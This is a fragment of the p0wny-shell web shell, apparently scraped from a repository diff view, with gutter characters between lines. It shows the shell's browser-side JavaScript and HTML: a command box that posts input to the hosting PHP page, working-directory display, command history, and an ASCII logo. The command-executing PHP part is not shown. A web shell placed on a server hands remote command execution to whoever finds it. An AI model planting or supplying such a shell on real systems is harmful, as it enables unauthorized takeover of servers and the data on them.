makeRequest("&feature=pwd", {}, function(response) {
|
|
||||||
CWD = atob(response.cwd);
|
|
||||||
_updatePrompt();
|
|
||||||
});
|
|
||||||
|
|
||||||
}
|
|
||||||
|
|
||||||
function escapeHtml(string) {
|
|
||||||
return string
|
|
||||||
.replace(/&/g, "&")
|
|
||||||
.replace(/</g, "<")
|
|
||||||
.replace(/>/g, ">");
|
|
||||||
}
|
|
||||||
|
|
||||||
function _updatePrompt() {
|
|
||||||
var eShellPrompt = document.getElementById("shell-prompt");
|
|
||||||
eShellPrompt.innerHTML = genPrompt(CWD);
|
|
||||||
}
|
|
||||||
|
|
||||||
function _onShellCmdKeyDown(event) {
|
|
||||||
switch (event.key) {
|
|
||||||
case "Enter":
|
|
||||||
featureShell(eShellCmdInput.value);
|
|
||||||
insertToHistory(eShellCmdInput.value);
|
|
||||||
eShellCmdInput.value = "";
|
|
||||||
break;
|
|
||||||
case "ArrowUp":
|
|
||||||
if (historyPosition > 0) {
|
|
||||||
historyPosition--;
|
|
||||||
eShellCmdInput.blur();
|
|
||||||
eShellCmdInput.value = commandHistory[historyPosition];
|
|
||||||
_defer(function() {
|
|
||||||
eShellCmdInput.focus();
|
|
||||||
});
|
|
||||||
}
|
|
||||||
break;
|
|
||||||
case "ArrowDown":
|
|
||||||
if (historyPosition >= commandHistory.length) {
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
historyPosition++;
|
|
||||||
if (historyPosition === commandHistory.length) {
|
|
||||||
eShellCmdInput.value = "";
|
|
||||||
} else {
|
|
||||||
eShellCmdInput.blur();
|
|
||||||
eShellCmdInput.focus();
|
|
||||||
eShellCmdInput.value = commandHistory[historyPosition];
|
|
||||||
}
|
|
||||||
break;
|
|
||||||
case 'Tab':
|
|
||||||
event.preventDefault();
|
|
||||||
featureHint();
|
|
||||||
break;
|
|
||||||
}
|
|
||||||
}
|
|
||||||
|
|
||||||
function insertToHistory(cmd) {
|
|
||||||
commandHistory.push(cmd);
|
|
||||||
historyPosition = commandHistory.length;
|
|
||||||
}
|
|
||||||
|
|
||||||
function makeRequest(url, params, callback) {
|
|
||||||
function getQueryString() {
|
|
||||||
var a = [];
|
|
||||||
for (var key in params) {
|
|
||||||
if (params.hasOwnProperty(key)) {
|
|
||||||
a.push(encodeURIComponent(key) + "=" + encodeURIComponent(params[key]));
|
|
||||||
}
|
|
||||||
}
|
|
||||||
return a.join("&");
|
|
||||||
}
|
|
||||||
var url_plus = window.location+url;
|
|
||||||
var xhr = new XMLHttpRequest();
|
|
||||||
xhr.open("POST", url_plus, true);
|
|
||||||
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
|
|
||||||
xhr.onreadystatechange = function() {
|
|
||||||
if (xhr.readyState === 4 && xhr.status === 200) {
|
|
||||||
try {
|
|
||||||
var responseJson = JSON.parse(xhr.responseText);
|
|
||||||
callback(responseJson);
|
|
||||||
} catch (error) {
|
|
||||||
alert("Error while parsing response: " + error);
|
|
||||||
}
|
|
||||||
}
|
|
||||||
};
|
|
||||||
xhr.send(getQueryString());
|
|
||||||
}
|
|
||||||
|
|
||||||
document.onclick = function(event) {
|
|
||||||
event = event || window.event;
|
|
||||||
var selection = window.getSelection();
|
|
||||||
var target = event.target || event.srcElement;
|
|
||||||
|
|
||||||
if (target.tagName === "SELECT") {
|
|
||||||
return;
|
|
||||||
}
|
|
||||||
|
|
||||||
if (!selection.toString()) {
|
|
||||||
eShellCmdInput.focus();
|
|
||||||
}
|
|
||||||
};
|
|
||||||
|
|
||||||
window.onload = function() {
|
|
||||||
eShellCmdInput = document.getElementById("shell-cmd");
|
|
||||||
eShellContent = document.getElementById("shell-content");
|
|
||||||
updateCwd();
|
|
||||||
eShellCmdInput.focus();
|
|
||||||
};
|
|
||||||
</script>
|
|
||||||
</head>
|
|
||||||
|
|
||||||
<body>
|
|
||||||
<div id="shell">
|
|
||||||
<pre id="shell-content">
|
|
||||||
<div id="shell-logo">
|
|
||||||
___ ____ _ _ _ _ _ <span></span>
|
|
||||||
_ __ / _ \__ ___ __ _ _ / __ \ ___| |__ ___| | |_ /\/|| || |_ <span></span>
|
|
||||||
| '_ \| | | \ \ /\ / / '_ \| | | |/ / _` / __| '_ \ / _ \ | (_)/\/_ .. _|<span></span>
|
|
||||||
| |_) | |_| |\ V V /| | | | |_| | | (_| \__ \ | | | __/ | |_ |_ _|<span></span>
|
|
||||||
| .__/ \___/ \_/\_/ |_| |_|\__, |\ \__,_|___/_| |_|\___|_|_(_) |_||_| <span></span>
|
|
||||||
|_| |___/ \____/ <span></span>
|
|
||||||
</div>
|
|
||||||
</pre>
|
|
||||||
<div id="shell-input">
|
|
||||||
<label for="shell-cmd" id="shell-prompt" class="shell-prompt">???</label>
|
|
||||||
<div>
|
|
||||||
<input id="shell-cmd" name="cmd" onkeydown="_onShellCmdKeyDown(event)"/>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
</div>
|
|
||||||
<p><b><a href="https://github.com/flozz/p0wny-shell">Source: p0wny-shell by flozz</a></b><p>
|
|
||||||
</body>
|
|
||||||
|
|
||||||
</html>
|
|
||||||
<?php die(); ?>
|
|
||||||
Reference in New Issue
Block a user